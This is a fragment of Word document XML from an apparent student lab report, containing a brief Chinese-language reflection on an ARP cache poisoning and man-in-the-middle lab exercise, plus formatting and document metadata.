          <w:color w:val="000000"/>
          <w:sz w:val="29"/>
          <w:szCs w:val="29"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验感想</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377C8B3" w14:textId="64C8D0C6" w:rsidR="00FD54F1" w:rsidRPr="00FD54F1" w:rsidRDefault="00FD54F1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次实验是关于A</w:t>
      </w:r>
      <w:r>
        <w:t>RP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的攻击，大致思想和之前几次实验差不多，都是通过中间人进行嗅探包并换成自己的data内容，并通过污染受害者的ARP缓存进行攻击。这次实验不仅让我对ARP机制有了更深的理解，还让我对前几次实验的中间人攻击有了更深的理解。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FD54F1" w:rsidRPr="00FD5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4E110" w14:textId="77777777" w:rsidR="00695C24" w:rsidRDefault="00695C24" w:rsidP="00F229BC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F7FC9E6" w14:textId="77777777" w:rsidR="00695C24" w:rsidRDefault="00695C24" w:rsidP="00F22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A5C52" w14:textId="77777777" w:rsidR="00695C24" w:rsidRDefault="00695C24" w:rsidP="00F229BC">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="36E1EE6A" w14:textId="77777777" w:rsidR="00695C24" w:rsidRDefault="00695C24" w:rsidP="00F229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36F"/>
    <w:rsid w:val="00001B6F"/>
    <w:rsid w:val="000E1FD0"/>
    <w:rsid w:val="0010558D"/>
    <w:rsid w:val="0013326F"/>
    <w:rsid w:val="00162DA9"/>
    <w:rsid w:val="003C3918"/>
    <w:rsid w:val="003F636F"/>
    <w:rsid w:val="00464A21"/>
    <w:rsid w:val="00476044"/>
    <w:rsid w:val="00525669"/>
    <w:rsid w:val="00695C24"/>
    <w:rsid w:val="006E60C4"/>
    <w:rsid w:val="00761F1D"/>
    <w:rsid w:val="00825493"/>
    <w:rsid w:val="008442A7"/>
    <w:rsid w:val="008E1CF6"/>
    <w:rsid w:val="00935BF1"/>
    <w:rsid w:val="009A77C3"/>
    <w:rsid w:val="00A778EA"/>
    <w:rsid w:val="00A972F6"/>
    <w:rsid w:val="00B4184E"/>
    <w:rsid w:val="00BC0683"/>
    <w:rsid w:val="00BC2A42"/>
    <w:rsid w:val="00E42C2B"/>
    <w:rsid w:val="00F229BC"/>
    <w:rsid w:val="00F40320"/>
    <w:rsid w:val="00F672A7"/>
    <w:rsid w:val="00FD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3D98A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{915E4919-AC71-4BE8-B069-A0E57308A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29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29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29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29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宸玮</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>顾 宸玮</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-15T07:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-16T02:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>